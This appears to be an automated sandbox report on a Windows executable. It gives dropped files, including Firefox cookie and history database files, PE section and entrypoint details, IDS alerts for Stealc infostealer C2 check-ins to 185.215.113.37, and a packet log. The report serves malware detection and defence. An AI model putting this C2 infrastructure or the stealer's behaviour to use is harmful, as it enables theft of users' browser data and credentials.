File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-shm

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.947438176121564
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	1'885'184 bytes
MD5:	6be29c7d09b8a432f22ad1af2e94ab69
SHA1:	d677e36581d3772e6a4cef3978e2566f7369b1d6
SHA256:	8feb29e2e21519c5fe6d92999271bf4419c896d19b4a514f6cac5dfbbd6005d1
SHA512:	c16142b3581a80d52b3ce0697187244f94cb591310fd02565e79c15b17238b1c65c95e4be57832e7ce889fa8d78580d07fef8d42f7debe1a67b8bb046249192b
SSDEEP:	49152:izoO3CyCzK1XYW3WRipIWgINPNtNyBELOF:TOSzK1IWm+I98N6JF
TLSH:	0995330F671AA052FCCECCBC5957F3407BA329A60767CD3F2609979EBC61E42460A16D
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0xab2000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007F7211332DDAh
cpuid
sbb al, 00h
add byte ptr [eax], al
add byte ptr [eax], al
jmp 00007F7211334DD5h
add byte ptr [edx+ecx], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
and byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
and dword ptr [eax], eax
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add al, 0Ah
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [eax+00000000h], eax
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
pop es
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al

Rich Headers

Programming Language:

[C++] VS2010 build 30319
[ASM] VS2010 build 30319
[ C ] VS2010 build 30319
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[LNK] VS2010 build 30319

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x25d050	0x64	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x25d1f8	0x8	.idata
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x25b000	0x22800	7d4e76cff213c8948025a7ea2e50fe5a	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x25c000	0x1000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x25d000	0x1000	0x200	c60c4959cc8d384ac402730cc6842bb0	False	0.1328125	data	0.9064079259880791	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x25e000	0x2ad000	0x200	ccf1600a4b07c4b6fb011bd611cf8147	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
aqokowyf	0x50b000	0x1a6000	0x1a6000	8cb68b77102a41fa413099b88afebd81	False	0.9948938740373223	data	7.953728087225671	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
vexjavgk	0x6b1000	0x1000	0x600	bb862609058ad884bbb72f5fcdc3318e	False	0.541015625	data	4.864968893163448	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x6b2000	0x3000	0x2200	cb4f5546723f0266567fcd08c92777dc	False	0.058363970588235295	DOS executable (COM)	0.7774989257278921	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Imports

DLL	Import
kernel32.dll	lstrcpy

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-01T16:49:58.502724+0200	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.5	49704	185.215.113.37	80	TCP
2024-10-01T16:49:58.726534+0200	2044244	ET MALWARE Win32/Stealc Requesting browsers Config from C2	1	192.168.2.5	49704	185.215.113.37	80	TCP
2024-10-01T16:49:58.733313+0200	2044245	ET MALWARE Win32/Stealc Active C2 Responding with browsers Config	1	185.215.113.37	80	192.168.2.5	49704	TCP
2024-10-01T16:49:58.949560+0200	2044246	ET MALWARE Win32/Stealc Requesting plugins Config from C2	1	192.168.2.5	49704	185.215.113.37	80	TCP
2024-10-01T16:49:58.956811+0200	2044247	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config	1	185.215.113.37	80	192.168.2.5	49704	TCP
2024-10-01T16:50:00.059613+0200	2044248	ET MALWARE Win32/Stealc Submitting System Information to C2	1	192.168.2.5	49704	185.215.113.37	80	TCP
2024-10-01T16:50:00.293208+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.5	49704	185.215.113.37	80	TCP
2024-10-01T16:50:05.229038+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.5	49704	185.215.113.37	80	TCP
2024-10-01T16:50:06.320403+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.5	49704	185.215.113.37	80	TCP
2024-10-01T16:50:06.970382+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.5	49704	185.215.113.37	80	TCP
2024-10-01T16:50:07.508611+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.5	49704	185.215.113.37	80	TCP
2024-10-01T16:50:10.186303+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.5	49704	185.215.113.37	80	TCP
2024-10-01T16:50:10.450224+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.5	49704	185.215.113.37	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 1, 2024 16:49:57.534480095 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:49:57.539330006 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:49:57.539437056 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:49:57.540054083 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:49:57.545202017 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:49:58.239839077 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:49:58.239934921 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:49:58.267704964 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:49:58.272655010 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:49:58.502528906 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:49:58.502723932 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:49:58.503904104 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:49:58.509076118 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:49:58.726457119 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:49:58.726471901 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:49:58.726533890 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:49:58.726555109 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:49:58.728424072 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:49:58.733313084 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:49:58.949500084 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:49:58.949512005 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:49:58.949522018 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:49:58.949559927 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:49:58.949615002 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:49:58.949625969 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:49:58.949644089 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:49:58.949656010 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:49:58.949667931 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:49:58.949692011 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:49:58.949701071 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:49:58.949922085 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:49:58.949966908 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:49:58.950078964 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:49:58.950170994 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:49:58.952014923 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:49:58.956810951 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:49:59.186431885 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:49:59.186506987 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:49:59.204948902 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:49:59.204993010 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:49:59.209810019 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:49:59.209906101 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:49:59.209916115 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:49:59.210030079 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:49:59.210040092 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:49:59.210432053 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:00.059472084 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:00.059612989 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:00.074737072 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:00.079642057 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:00.292946100 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:00.292969942 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:00.292980909 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:00.293207884 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:00.293231964 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:00.293242931 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:00.293282032 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:00.293286085 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:00.293298960 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:00.293323040 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:00.293343067 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:00.293343067 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:00.293637037 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:00.293648005 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:00.293658972 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:00.293703079 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:00.293703079 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:00.294361115 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:00.294433117 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:00.294456005 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:00.294581890 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:00.417234898 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:00.417300940 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:00.417311907 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:00.417395115 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:00.417407990 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:00.417418957 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:00.417442083 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:00.417442083 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:00.417442083 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:00.417613983 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:00.417978048 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:00.417990923 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:00.418001890 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:00.418046951 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:00.418059111 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:00.418065071 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:00.418065071 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:00.418109894 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:00.418718100 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:00.418730021 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:00.418741941 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:00.418788910 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:00.418808937 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:00.419097900 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:00.419111013 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:00.419151068 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:00.419184923 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:00.419585943 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:00.419598103 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:00.419609070 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:00.419663906 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:00.419676065 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:00.419708014 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:00.419708014 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:00.419758081 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:00.419758081 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:00.420442104 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:00.420454025 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:00.420465946 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:00.420500040 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:00.420519114 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:00.420787096 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:00.420871019 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:00.541520119 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:00.541537046 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:00.541547060 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:00.541635036 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:00.541635036 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:00.541635036 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:00.541646957 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:00.541659117 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:00.541671038 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:00.541682959 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:00.541697025 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:00.541748047 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:00.541748047 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:00.542166948 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:00.542177916 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:00.542188883 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:00.542309046 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:00.542309046 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:00.542404890 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:00.542427063 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:00.542438984 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:00.542449951 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:00.542459965 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:00.542484999 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:00.542520046 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:00.542520046 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:00.542916059 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:00.542926073 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:00.542937040 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:00.542953968 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:00.542963982 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:00.542973995 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:00.542984962 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:00.542999983 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:00.543015957 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:00.543020010 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:00.543032885 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:00.543067932 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:00.543915987 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:00.543926954 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:00.543936014 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:00.543946981 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:00.543958902 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:00.543968916 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:00.543981075 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:00.543981075 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:00.543992043 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:00.544015884 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:00.544053078 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:00.544781923 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:00.544792891 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:00.544810057 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:00.544820070 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:00.544831038 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:00.544841051 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:00.544841051 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:00.544852972 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:00.544863939 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:00.544867992 CEST	49704	80	192.168.2.5	185.215.113.37
